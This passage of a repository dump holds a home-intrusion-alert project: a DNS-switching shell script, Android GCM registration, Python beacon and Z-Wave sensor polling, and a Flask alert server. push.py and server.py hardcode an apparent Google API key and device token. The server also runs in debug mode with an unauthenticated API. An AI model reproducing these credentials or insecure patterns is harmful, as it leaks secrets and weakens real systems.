0.6907962560653687, "alphanum_fraction": 0.7176835536956787, "avg_line_length": 18.73469352722168, "blob_id": "14ec0efa6a86a46f397edb91869945de1c55d9ca", "content_id": "b242501643be12348dd4e9569da1093a0cd461de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 967, "license_type": "no_license", "max_line_length": 59, "num_lines": 49, "path": "/changeDNS.sh", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nfunction usage(){\n\techo \"<script name> [o|f]\"\n\t\techo\t\"-o starts the openDNS Server\"\n\t\techo \"-f stops the openDNS server\"\t\t\n}\n\nfunction startOpenDNS(){\n\techo \"Cambiando a OpenDNS\"\n\t\tsudo service hostapd stop\n\t\tsudo service isc-dhcp-server stop\n\t\tsudo cp /etc/dhcp/dhcpd-opendns.conf /etc/dhcp/dhcpd.conf\n\t\tsudo ifdown wlan0 && sudo ifup wlan0\n\t\tsudo ifconfig wlan0 192.168.42.1\n\t\tsudo service isc-dhcp-server start\n\t\tsudo service hostapd start\n\t\techo \"Cambio a OpenDNS realizado\"\n}\n\nfunction stopOpenDNS(){\n\techo \"Quitando el OpenDNS\"\n\t\tsudo service hostapd stop\n\t\tsudo service isc-dhcp-server stop\n\t\tsudo cp /etc/dhcp/dhcpd-normal.conf /etc/dhcp/dhcpd.conf\n\t\tsudo ifdown wlan0 && sudo ifup wlan0\n\t\tsudo ifconfig wlan0 192.168.42.1 \n\t\tsudo service isc-dhcp-server start\n\t\tsudo service hostapd start\n\t\techo \"OpenDNS apagado\"\n}\n\nwhile getopts \":of\" opts; do\ncase \"${opts}\" in\no)\nstartOpenDNS\n;;\nf)\nstopOpenDNS\n;;\n*)\nusage\nexit -1\n;;\nesac\ndone\n\n\nexit 0\n" }, { "alpha_fraction": 0.44999998807907104, "alphanum_fraction": 0.44999998807907104, "avg_line_length": 9, "blob_id": "ad2a7f5631f2cc446cf2a1b9400ad5a81178f8e8", "content_id": "775dd423dedc813d8e13598270f6bb8f7cde7cae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 20, "license_type": "no_license", "max_line_length": 9, "num_lines": 2, "path": "/README.md", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "cybercamp\n=========\n" }, { "alpha_fraction": 0.6337937116622925, "alphanum_fraction": 0.6391885876655579, "avg_line_length": 34.1136360168457, "blob_id": "1362fd96f38188da1260b6e5ca753af4eb70748e", "content_id": "00bbfb7ebe1e521b8c410ef48b7b1dad8407a50e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4634, "license_type": "no_license", "max_line_length": 107, "num_lines": 132, "path": "/Safe/app/src/main/java/com/gipsyz/safe/gcm/GcmRegisterActivity.java", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "package com.gipsyz.safe.gcm;\n\nimport android.app.Activity;\nimport android.content.Context;\nimport android.content.SharedPreferences;\nimport android.os.AsyncTask;\nimport android.os.Build;\nimport android.os.Bundle;\nimport android.support.v7.app.ActionBarActivity;\nimport android.util.Log;\n\nimport com.gipsyz.safe.AppUtils;\nimport com.google.android.gms.common.ConnectionResult;\nimport com.google.android.gms.common.GooglePlayServicesUtil;\nimport com.google.android.gms.gcm.GoogleCloudMessaging;\nimport com.google.gson.JsonObject;\nimport com.koushikdutta.async.future.FutureCallback;\nimport com.koushikdutta.ion.Ion;\n\nimport java.io.IOException;\nimport java.util.concurrent.atomic.AtomicInteger;\n\n/**\n * Created by batman on 06/12/2014.\n */\npublic class GcmRegisterActivity extends Activity {\n\n public static final String EXTRA_MESSAGE = \"message\";\n public static final String PROPERTY_REG_ID = \"registration_id\";\n public static final String PROPERTY_DEVICE_ID = \"device_id\";\n private static final String PROPERTY_APP_VERSION = \"appVersion\";\n private final static int PLAY_SERVICES_RESOLUTION_REQUEST = 9000;\n\n GoogleCloudMessaging gcm;\n AtomicInteger msgId = new AtomicInteger();\n SharedPreferences prefs;\n String regid;\n\n @Override\n protected void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n if (checkPlayServices()) {\n gcm = GoogleCloudMessaging.getInstance(this);\n regid = getRegistrationId();\n if (regid.isEmpty()) {\n registerInBackground();\n }\n } else {\n Log.i(AppUtils.TAG, \"No valid Google Play Services APK found.\");\n }\n }\n\n private boolean checkPlayServices() {\n int resultCode = GooglePlayServicesUtil.isGooglePlayServicesAvailable(this);\n if (resultCode != ConnectionResult.SUCCESS) {\n if (GooglePlayServicesUtil.isUserRecoverableError(resultCode)) {\n GooglePlayServicesUtil.getErrorDialog(resultCode, this,\n PLAY_SERVICES_RESOLUTION_REQUEST).show();\n } else {\n Log.i(AppUtils.TAG, \"This device is not supported.\");\n finish();\n }\n return false;\n }\n return true;\n }\n\n private String getRegistrationId() {\n final SharedPreferences prefs = getSharedPreferences(AppUtils.HIDDEN_PREFS, Context.MODE_PRIVATE);;\n String registrationId = prefs.getString(PROPERTY_REG_ID, \"\");\n if (registrationId.isEmpty()) {\n Log.i(AppUtils.TAG, \"Registration not found.\");\n return \"\";\n }\n // Check if app was updated; if so, it must clear the registration ID\n // since the existing regID is not guaranteed to work with the new\n // app version.\n int registeredVersion = prefs.getInt(PROPERTY_APP_VERSION, Integer.MIN_VALUE);\n int currentVersion = AppUtils.getAppVersion(this);\n if (registeredVersion != currentVersion) {\n Log.i(AppUtils.TAG, \"App version changed.\");\n return \"\";\n }\n return registrationId;\n }\n\n\n private void registerInBackground() {\n new RegisterAsync().execute((Void) null);\n }\n\n class RegisterAsync extends AsyncTask<Void, Void, String> {\n @Override\n protected String doInBackground(Void... params) {\n String msg = \"\";\n try {\n if (gcm == null) {\n gcm = GoogleCloudMessaging.getInstance(GcmRegisterActivity.this);\n }\n regid = gcm.register(\"687164714334\");\n msg = \"Device registered, registration ID=\" + regid;\n storeRegistrationData(regid);\n } catch (IOException ex) {\n msg = \"Error :\" + ex.getMessage();\n }\n return msg;\n }\n\n @Override\n protected void onPreExecute() {\n super.onPreExecute();\n }\n\n @Override\n protected void onPostExecute(String s) {\n super.onPostExecute(s);\n Log.i(AppUtils.TAG, s);\n }\n }\n\n private void storeRegistrationData(String regId) {\n final SharedPreferences prefs = getSharedPreferences(AppUtils.HIDDEN_PREFS, MODE_PRIVATE);\n int appVersion = AppUtils.getAppVersion(GcmRegisterActivity.this);\n Log.i(AppUtils.TAG, \"Saving regId on app version \" + appVersion);\n SharedPreferences.Editor editor = prefs.edit();\n editor.putString(PROPERTY_REG_ID, regId);\n editor.putInt(PROPERTY_APP_VERSION, appVersion);\n editor.commit();\n }\n\n\n}" }, { "alpha_fraction": 0.7086614370346069, "alphanum_fraction": 0.7283464670181274, "avg_line_length": 24.399999618530273, "blob_id": "970c68698e3665f3c35fcdb415eb5cf49684dcf8", "content_id": "c157fa33b6106ff4711f5daf3a273ad3a738d58e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 254, "license_type": "no_license", "max_line_length": 62, "num_lines": 10, "path": "/Safe/beacons/src/main/java/com/beeva/beaconsutils/BluetoothNotSuportedException.java", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "package com.beeva.beaconsutils;\n\n/**\n * Created by marianclaudiu on 5/11/14.\n */\npublic class BluetoothNotSuportedException extends Exception {\n public BluetoothNotSuportedException() {\n super(\"Bluetooth not supported on this device\");\n }\n}\n" }, { "alpha_fraction": 0.5700325965881348, "alphanum_fraction": 0.5819761157035828, "avg_line_length": 17.058822631835938, "blob_id": "e57a68b833950dc153864af31020880c60d8d24a", "content_id": "7d7bff7851d9b16614e71d542eb41eb0b28e60c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 921, "license_type": "no_license", "max_line_length": 56, "num_lines": 51, "path": "/Safe/app/src/main/java/com/gipsyz/safe/dto/SimpleBeacon.java", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "package com.gipsyz.safe.dto;\n\nimport uk.co.alt236.bluetoothlelib.device.IBeaconDevice;\n\n/**\n * Created by batman on 06/12/2014.\n */\npublic class SimpleBeacon {\n\n private String id;\n private String uuid;\n private int major, minor;\n\n public SimpleBeacon(IBeaconDevice device){\n this.uuid = device.getUUID();\n this.major = device.getMajor();\n this.minor = device.getMinor();\n }\n\n public String getUuid() {\n return uuid;\n }\n\n public void setUuid(String uuid) {\n this.uuid = uuid;\n }\n\n public int getMajor() {\n return major;\n }\n\n public void setMajor(int major) {\n this.major = major;\n }\n\n public int getMinor() {\n return minor;\n }\n\n public void setMinor(int minor) {\n this.minor = minor;\n }\n\n public String getId() {\n return id;\n }\n\n public void setId(String id) {\n this.id = id;\n }\n}\n" }, { "alpha_fraction": 0.6685823798179626, "alphanum_fraction": 0.6832695007324219, "avg_line_length": 34.59090805053711, "blob_id": "c2fb228831a4147ab67a3adb396482061f6067b7", "content_id": "9871b212e51c6f16d9bb534e9994be66f297bda4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1566, "license_type": "no_license", "max_line_length": 106, "num_lines": 44, "path": "/Safe/app/src/main/java/com/gipsyz/safe/AppUtils.java", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "package com.gipsyz.safe;\n\nimport android.accounts.Account;\nimport android.accounts.AccountManager;\nimport android.app.ActivityManager;\nimport android.content.Context;\nimport android.content.pm.PackageInfo;\nimport android.content.pm.PackageManager;\nimport android.util.Patterns;\n\nimport java.util.regex.Pattern;\n\n/**\n * Created by batman on 06/12/2014.\n */\npublic class AppUtils {\n public final static String TAG = \"Safe\";\n public static final String HIDDEN_PREFS = \"hidden_prefs\";\n public static final String BASE_URL = \"http://192.168.1.147:8080\";\n public static final String OPEN_URL = BASE_URL + \"/open\";\n public static final String BEACON_URL = BASE_URL + \"/api/beacon\";\n\n\n public static boolean isServiceRunning(String className, Context context) {\n ActivityManager manager = (ActivityManager) context.getSystemService(Context.ACTIVITY_SERVICE);\n for (ActivityManager.RunningServiceInfo service : manager.getRunningServices(Integer.MAX_VALUE)) {\n if (className.equals(service.service.getClassName())) {\n return true;\n }\n }\n return false;\n }\n\n public static int getAppVersion(Context context) {\n try {\n PackageInfo packageInfo = context.getPackageManager()\n .getPackageInfo(context.getPackageName(), 0);\n return packageInfo.versionCode;\n } catch (PackageManager.NameNotFoundException e) {\n // should never happen\n throw new RuntimeException(\"Could not get package name: \" + e);\n }\n }\n}\n" }, { "alpha_fraction": 0.6856356263160706, "alphanum_fraction": 0.6938962936401367, "avg_line_length": 22.868131637573242, "blob_id": "31c09fc39b32181361dbc28c26f610a666b65df0", "content_id": "8c36c19bc5eda4f35a418ded55ea2cb45e741c32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2179, "license_type": "no_license", "max_line_length": 109, "num_lines": 91, "path": "/loop.py", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "import blescan\nimport sys\nimport bluetooth._bluetooth as bluez\nimport time\nimport pickledb\nimport commands\nimport requests\n\nfrom sensor import ZWay\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask import Flask, jsonify\nfrom server import Beacon\n\n\n#Sqlite acces\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///temp/test.db'\ndb = SQLAlchemy(app)\n\n#Beacon init\ndev_id = 0\ntry:\n\tsock = bluez.hci_open_dev(dev_id)\n\tprint \"ble thread started\"\nexcept:\n\tprint \"error accessing bluetooth device...\"\n\tsys.exit(1)\nblescan.hci_le_set_scan_parameters(sock)\nblescan.hci_enable_le_scan(sock)\n\n#ZWave sensors init\npdb = pickledb.load('movements.db', False)\nz = ZWay()\n\n#sys.path.append('/home/pi/workspace/cybercamp')\n#import sensor\n\ndef sensor():\n return z.getMovement()\n\n\ndef mashup(items):\n\titem = {}\n\tif(len(items) > 0):\n\t\titem['uuid'] = items[0]['uuid']\n\t\titem['major'] = items[0]['major']\n\t\titem['minor'] = items[0]['minor']\n\t\titem['distance'] = items[0]['distance']\n\t\tfor x in items:\n\t\t\titem['distance'] = item['distance'] + x['distance']\n\t\titem['distance'] = item['distance']/float(len(items))\n\t\treturn item\n\telse:\n\t\treturn None\n\n\ndef beacon_close():\n\treturnedList = blescan.parse_events(sock, 10)\n\tnewlist = sorted(returnedList, key=lambda k: k['distance']) \n\tbeacon = mashup(newlist)\n\n\tif(beacon is not None):\n\t\tthings = Beacon.query.all()\n\t\tfor x in things:\n\t\t\tif x.uuid.replace('-','') == beacon['uuid'] and x.major == beacon['major'] and x.major == beacon['major']:\n\t\t\t\treturn True\n\treturn False\n\ndef device_in_net():\n\tret = commands.getoutput(\"arp -an | grep cc:fa:00:f6:9b:d6\")\n\treturn not (ret == '')\n\nbeacon = False\nmovimiento = False\ndevice = False\n\nwhile True:\n\t# activate the sensor\n\t# check the database for recent movements\n\n\tnewbeacon = beacon_close()\n\tnewmovimiento = sensor()\n\tnewdevice = device_in_net()\n\n\tif((beacon != newbeacon) or (movimiento != newmovimiento) or (device != newdevice)):\n\t\tprint \"Event\"\n\t\tpayload = {'movimiento': newmovimiento, 'beacon': newbeacon, 'device': newdevice}\n\t\tr = requests.get(\"http://localhost:8080/event\", params=payload)\n\t\tmovimiento = newmovimiento\n\t\tbeacon = newbeacon\n\t\tdevice = newdevice\n\n\n\n\n\t\n\n" }, { "alpha_fraction": 0.6397849321365356, "alphanum_fraction": 0.6612903475761414, "avg_line_length": 22.25, "blob_id": "bd7db9bba104bca60dbf2b2eac8a8c57a6f356fb", "content_id": "b7d459790c7f8436447fbf4b978de0b04fed25b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 186, "license_type": "no_license", "max_line_length": 71, "num_lines": 8, "path": "/push.py", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "from gcm import GCM\n\ngcm = GCM('AIzaSyCxXaknhqHcNAxxSKGseYQrpgHB5COLF00')\ndata = {'type': 'value1', 'message': 'value2'}\ntry:\n\tgcm.plaintext_request(registration_id='APA91bGxJ3Y2n4pExPc8kX1PAyuARTuA9p8a3LxwTj9d6LbAQ3aE4TYeaJ13nxqDohOtBW0ief8VdQl_H4Zz31gm5Csa61eT68RyeudpJH7lwJrzy-5yl3VmvZzYU3uIOnYMTfSGMozmhkV6DfEGblz6xUGmLrYBxQ', data=data, retries=10 )\nexcept:\n\tprint 'fail'\n" }, { "alpha_fraction": 0.5555073618888855, "alphanum_fraction": 0.5660595297813416, "avg_line_length": 32.05741500854492, "blob_id": "9962565ed4b60de30248cdc2daa6a0d1ea6b59a4", "content_id": "20f29fd5964122c4372a8a8e8d9a0e1a789e06c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6919, "license_type": "no_license", "max_line_length": 135, "num_lines": 209, "path": "/sensor.py", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "#!/usr/bin/Python2.7\n# -*- coding: utf-8 -*-\nimport time\nimport pprint\nimport requests\nimport json\nimport sys\nimport pickle\nimport pickledb \nimport l8Signals\n\n#class made to recover from z-way-server the sensor data\n#gets the ip addres\n#returns the data\nclass ZWay:\n def __init__(self):\n #server ip & port:\n self.address = \"http://192.168.1.147:8083/\"\n\n #constants values of the ZWaveAPI\n self.getAllDataURL = 'ZWaveAPI/Data/0'\n self.getDeviceDataURL_1 = 'ZWaveAPI/Run/devices['\n self.getInquireURL = '].instances[0].commandClasses[0x30].Get()'\n self.getDeviceDataURL_2 = '].instances[0].commandClasses[0x30].data'\n\n\n def getMovement(self):\n deviceN_=self.getDevices()\n data=Render()\n for deviceNum in deviceN_ :\n info= self.getRequest(self.getDeviceDataURL_1+str(deviceNum)+self.getDeviceDataURL_2,'OK')\n if (not info == None):\n return info['1']['level']['value']\n return False\n\n\n def performGetRequest(self):\n\n #search for connected devices\n deviceN_=self.getDevices()\n data=Render()\n #TODO:test the devices that have no relevant data\n \n #for each one of the devices try to pull data\n for deviceNum in deviceN_ : \n #obtains last updateTime from the sensor\n \n\t #timeStam = data.getSensorUpdateTime(self.getRequest(self.getDeviceDataURL_1+str(deviceNum)+self.getDeviceDataURL_2,'OK'))\n \n #inquires the devices for new data\n #self.getRequest(self.getDeviceDataURL_1+str(deviceNum)+self.getInquireURL,None)\n \n #obtains again the updateTime from sensor\n #timeStam2 = data.getSensorUpdateTime(self.getRequest(self.getDeviceDataURL_1+str(deviceNum)+self.getDeviceDataURL_2,'OK'))\n #print 'inital time stamp: ',timeStam, ' actual time: ',time.time(), ' update time:',timeStam2\n #while the data has not been updated wait for 1 minute\n #info = None\n\t #print (\"timeStam \", timeStam, \">= timeStam2\", timeStam2)\n\t \n #while (timeStam >= timeStam2):\n #if (timeStam != timeStam2):\n #enquires again for UpdateTime\n # print \"waiting for sensor response...\"\n\n # time.sleep(10)\n info= self.getRequest(self.getDeviceDataURL_1+str(deviceNum)+self.getDeviceDataURL_2,'OK')\n #timeStam2 = data.getSensorUpdateTime(info)\n #new instances of the render clas that will be entitled to feed the Spring api server with the proper data\n\t if (not info == None):\n#\tprint data\n\t \tdata.initiate(info)\n\t \tprint \"Movimiento detectado\"\n#else:\n# raise MyException(str(e)), None, sys.exc_info()[2]\n\n\n def getSensorUpdateTime(self,jsonData):\n resp=None\n try:\n for id_, item in jsonData['1'].iteritems():\n if id_ == 'updateTime':\n resp = item\n except Exception as e:\n print 'ERROR during updating the Sensor Time:'\n raise MyException(str(e)), None, sys.exc_info()[2]\n return resp\n\n\n def getDevices(self):\n \n devicesList = []\n jsonDev=self.getRequest(self.getAllDataURL,'OK')\n try:\n for id_, item in jsonDev['devices'].iteritems():\n if id_ != '1' and item!=\"NoneType\":\n devicesList.append(id_)\n #print (id_ , item) \n\n except Exception as e:\n print 'ERROR during searching for devices'\n raise MyException(str(e)), None, sys.exc_info()[2]\n return None\n\n return devicesList\n\n\n def getRequest(self,direction,err):\n resp = None\n try:\n #print 'Sending a get request to: ',self.address+direction\n response = requests.get(self.address+direction)\n result=response.status_code\n if (result == 200 and err != None):\n resp = response.json()\n elif (result == 200 and err == None):\n resp = 'OK'\n except Exception as e:\n print 'ERROR sending a get request to this direction:',direction\n raise MyException(str(e)), None, sys.exc_info()[2]\n return resp\n\n\n#render class\nclass Render:\n def __init__(self):\n self.MAXFIELDS=10\n self.MINFIELDS=0 \n self.sensorList=[]\n self.db = pickledb.load('movements.db', False) \n \n self.setSTime( 0)\n\n def setSTime(self, value):\n self.db.set('valor', value)\n self.db.dump()\n\n def getSTime(self):\n\talgo=self.db.get('valor')\n return algo \n\n def initiate(self, sensorData):\n try:\n for i in range (self.MINFIELDS,self.MAXFIELDS):\n if str(i) in sensorData:\n self.processFields(self.recoverFields(sensorData,str(i)))\n #jsons=self.mountJSON()\n #self.sendDataSpring(jsons)\n except BaseException as e:\n raise MyException(str(e)), None, sys.exc_info()[2]\n\n def getSensorUpdateTime(self,jsonData):\n resp=None\n try:\n for id_, item in jsonData['1'].iteritems():\n if id_ == 'updateTime':\n resp = item\n except Exception as e:\n print 'ERROR during updating the Sensor Time:'\n raise MyException(str(e)), None, sys.exc_info()[2]\n return resp\n\n\n#******************\n#Aquí se recuperan los valores \n#******************\n def recoverFields(self,data,position):\n try:\n\t tiempo=0;\n\t valor=\"false\";\n for id_, item in data[position].iteritems():\n if not (id_ == 'sensorTypeString') and id_ == 'level':\n valor= self.getValue(item)\n tiempo= self.getTime(item)\n self.setSTime(valor)\n except Exception as e:\n raise MyException(str(e)), None, sys.exc_info()[2]\n return None\n \n\n def getValue(self, diction):\n try:\n for id_, item in diction.iteritems():\n if id_ == 'value' :\n return item\n except Exception as e:\n raise MyException(str(e)), None, sys.exc_info()[2]\n return None\n\n def getTime(self, diction):\n try:\n for id_, item in diction.iteritems():\n if id_ == 'updateTime' :\n return item\n except Exception as e:\n raise MyException(str(e)), None, sys.exc_info()[2]\n return None\n\n# raise MyException('Not Implemented yet')\n\n def processFields(self,model):\n try:\n if not model == None:\n self.sensorList.append(model)\n except Exception as e:\n raise MyException(str(e)), None, sys.exc_info()[2]\n\n\n#own type of exception\nclass MyException(Exception): pass \n\n" }, { "alpha_fraction": 0.5561877489089966, "alphanum_fraction": 0.6365576386451721, "avg_line_length": 20.798450469970703, "blob_id": "f4d51833580cf03a776b3330ddf49b9c4b20d53d", "content_id": "d1502f255b3b14e0536719d96a10c71c2727b7ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2812, "license_type": "no_license", "max_line_length": 388, "num_lines": 129, "path": "/l8Signals.py", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport time\nimport requests\nimport l8\nimport json\n\n#vars\ncolor_verde=l8.Colour(0,255,0)\ncolor_rojo=l8.Colour(255,0,0)\ncolor_blanco=l8.Colour(255,255,255)\n\n#symbol\nlist_d=[]\n\nlist_d.append((0,3))\nlist_d.append((2,3))\nlist_d.append((4,3))\nlist_d.append((1,3))\nlist_d.append((3,3))\nlist_d.append((5,3))\nlist_d.append((7,3))\nlist_d.append((0,4))\nlist_d.append((2,4))\nlist_d.append((4,4))\nlist_d.append((1,4))\nlist_d.append((3,4))\nlist_d.append((5,4))\nlist_d.append((7,4))\n\n\n\n\nlist_ok=[]\n\nlist_ok.append((3,3))\nlist_ok.append((3,4))\nlist_ok.append((4,2))\nlist_ok.append((4,3))\nlist_ok.append((2,0))\nlist_ok.append((3,0))\nlist_ok.append((3,1))\nlist_ok.append((4,1))\nlist_ok.append((0,6))\nlist_ok.append((0,7))\nlist_ok.append((1,5))\nlist_ok.append((1,6))\nlist_ok.append((2,4))\nlist_ok.append((2,5))\nlist_ok.append((4,2))\nlist_ok.append((5,1))\nlist_ok.append((5,2))\n\n\n\nlist_x=[]\n\nlist_x.append((0,0))\nlist_x.append((1,0))\nlist_x.append((1,1))\nlist_x.append((2,1))\nlist_x.append((2,2))\nlist_x.append((3,2))\nlist_x.append((3,3))\nlist_x.append((3,4))\nlist_x.append((4,3))\nlist_x.append((4,4))\nlist_x.append((5,4))\nlist_x.append((5,5))\nlist_x.append((6,5))\nlist_x.append((6,6))\nlist_x.append((7,6))\nlist_x.append((7,7))\nlist_x.append((0,6))\nlist_x.append((0,7))\nlist_x.append((1,5))\nlist_x.append((1,6))\nlist_x.append((2,4))\nlist_x.append((2,5))\nlist_x.append((4,2))\nlist_x.append((5,1))\nlist_x.append((5,2))\nlist_x.append((6,0))\nlist_x.append((6,1))\nlist_x.append((7,0))\nlist_x.append((4,4))\n\n\nclass ELE8:\n\tdef __init__(self):\n\t\t#l8 device\n\t\tself.l = l8.L8Bt(\"00:17:EC:4C:62:EE\")\n\t\treturn None\n\n\n\tdef initial(self):\n\t\tself.l.send_clear()\n\t\tself.l.back_light(color_verde)\n\t\tprint (\"ENCENDER\")\n\t\t\n\tdef finalize(self):\n\t\tself.l.send_clear()\n\t\tself.l.back_light(color_blanco)\n\n\tdef paint_x(self):\n\t\tself.l.send_clear()\n\t\tself.l.back_light(color_rojo)\n\t\tfor i in list_x:\t\t\n\t\t\tself.l.set_light(i[0],i[1],color_rojo)\n\t\t\n\tdef paint_ok(self):\n\t\tself.l.send_clear()\n\t\tself.l.back_light(color_verde)\n\t\tfor i in list_ok:\t\t\n\t\t\tself.l.set_light(i[0],i[1],color_verde)\n\n\tdef paint_d(self):\n\t\tself.l.send_clear()\n\t\tself.l.back_light(color_rojo)\n\t\tfor i in list_d:\t\t\n\t\t\tself.l.set_light(i[0],i[1],color_rojo)\n\n\tdef post_result(self):\n\t\tdata={\"user\":2,\"gameType\":\"Basic\",\"att1\":list_mov[0],\"att1_time\":0.8,\"att2\":list_mov[1],\"att2_time\":0.3,\"att3\":list_mov[2],\"att3_time\":1.8,\"att4\":list_mov[3],\"att4_time\":0.5,\"att5\":list_mov[4],\"att5_time\":2.8,\"att6\":list_mov[5],\"att6_time\":0.2,\"att7\":list_mov[6],\"att7_time\":0.9,\"att8\":list_mov[7],\"att8_time\":3.8,\"att9\":list_mov[8],\"att9_time\":0.8,\"att10\":list_mov[9],\"att10_time\":0.7}\n\t\tprint data\n\t\turl=\"http://192.168.1.12:8000/api/game/\"\n\t\th={'Content-type': 'application/json', 'Accept': 'application/json'}\n\t\tr=requests.post(url, data=json.dumps(data), headers=h)\n\t\tprint r\n" }, { "alpha_fraction": 0.6296296119689941, "alphanum_fraction": 0.6296296119689941, "avg_line_length": 26, "blob_id": "73a3aedd5b410938d70cb2f866b46acd2c8255f0", "content_id": "c215740477f8f68f09b3c51c8c2bf38754405a24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 27, "license_type": "no_license", "max_line_length": 26, "num_lines": 1, "path": "/Safe/settings.gradle", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "include ':app', ':beacons'\n" }, { "alpha_fraction": 0.7126436829566956, "alphanum_fraction": 0.7318007946014404, "avg_line_length": 25.100000381469727, "blob_id": "9b9392fd91dbc556a9eb38d514e85182225bd27e", "content_id": "0e6bae91653d48749db940714251b2ab9f71e88c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 261, "license_type": "no_license", "max_line_length": 64, "num_lines": 10, "path": "/Safe/beacons/src/main/java/com/beeva/beaconsutils/BluetoothLENotSuportedException.java", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "package com.beeva.beaconsutils;\n\n/**\n * Created by marianclaudiu on 5/11/14.\n */\npublic class BluetoothLENotSuportedException extends Exception {\n public BluetoothLENotSuportedException() {\n super(\"Bluetooth LE Not supported on this device\");\n }\n}\n" }, { "alpha_fraction": 0.622613251209259, "alphanum_fraction": 0.6499438285827637, "avg_line_length": 25.700000762939453, "blob_id": "9e6db19f72a5651b17254d9c185454510881919f", "content_id": "067107ea70d4c267ab7cb3a2f1970b96e9e18cec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2671, "license_type": "no_license", "max_line_length": 231, "num_lines": 100, "path": "/server.py", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "#!flask/bin/python\nfrom l8Signals import ELE8\nfrom flask import Flask, jsonify\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask import request\nfrom gcm import GCM\nimport flask.ext.restless\nimport json\nimport time\nimport commands\nimport pickledb\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///temp/test.db'\ndb = SQLAlchemy(app)\n\nclass Beacon(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n uuid = db.Column(db.String(120))\n major = db.Column(db.Integer)\n minor = db.Column(db.Integer)\n\n def __init__(self, uuid, major, minor):\n self.uuid = uuid\n self.major = major\n self.minor = minor\n\n def __repr__(self):\n return '<Beacon %r>' % self.uuid\n\ndef send_push(type, description):\n gcm = GCM('AIzaSyCxXaknhqHcNAxxSKGseYQrpgHB5COLF00')\n data = {'type': type, 'message': description}\n try:\n gcm.plaintext_request(registration_id='APA91bGxJ3Y2n4pExPc8kX1PAyuARTuA9p8a3LxwTj9d6LbAQ3aE4TYeaJ13nxqDohOtBW0ief8VdQl_H4Zz31gm5Csa61eT68RyeudpJH7lwJrzy-5yl3VmvZzYU3uIOnYMTfSGMozmhkV6DfEGblz6xUGmLrYBxQ', data=data, retries=10 )\n except:\n print 'fail'\n\ndef send_intrusion():\n send_push('Intrusion', 'Alguien no autorizada ha entrado en el hogar')\n\ndef send_entrada_salida():\n send_push('Acceso', 'Alguien conocido ha entrado en casa')\n\n\[email protected]('/event', methods=['GET'])\ndef get_events():\n pdb = pickledb.load('movements.db', False)\n status = pdb.get('status')\n beacon = request.args.get('beacon',False,type=bool)\n device = request.args.get('device',False,type=bool)\n movement = request.args.get('movement', False, type=bool)\n if(not beacon and not device and movement and status != 0):\n send_intrusion()\n x8 = ELE8()\n x8.initial()\n x8.paint_d()\n time.sleep(5)\n x8.finalize()\n status = 0\n elif(beacon or device):\n if(not device and status != 2):\n x = commands.getoutput(\"sudo bash changeDNS.sh -f\")\n status = 2\n elif(status != 3):\n x = commands.getoutput(\"sudo bash changeDNS.sh -o\")\n status = 3\n else:\n status = 1\n send_entrada_salida()\n x8 = ELE8()\n x8.initial()\n x8.paint_ok()\n time.sleep(5)\n x8.finalize()\n else:\n status = 4\n pdb.set('status',status)\n pdb.dump()\n return \"Yeah\"\n\[email protected]('/open', methods=['GET'])\ndef get_open():\n send_entrada_salida()\n x8 = ELE8()\n x8.initial()\n x8.paint_ok()\n time.sleep(5)\n x8.finalize()\n return 'Yeah'\n\nmanager = flask.ext.restless.APIManager(app, flask_sqlalchemy_db=db)\n\nmanager.create_api(Beacon, methods=['GET', 'POST', 'DELETE'])\n\n\nif __name__ == '__main__':\n\n app.run(debug=True, host='0.0.0.0', port=8080)\n\n" } ]
16
GrahamOMalley/spiderBro
https://github.com/GrahamOMalley/spiderBro
107fb2d03a87a8a02607aad8cd8bb51befd6ab44
53379cc41128a714e30551fe946f587ad60e72c8
fc93b3817f1fb8bb6c5a37884790741d34ba1707
refs/heads/master
2020-04-26T02:53:40.981210
2015-05-11T10:19:33
2015-05-11T10:19:33
1,685,002
2
0
null
null
null
null
null
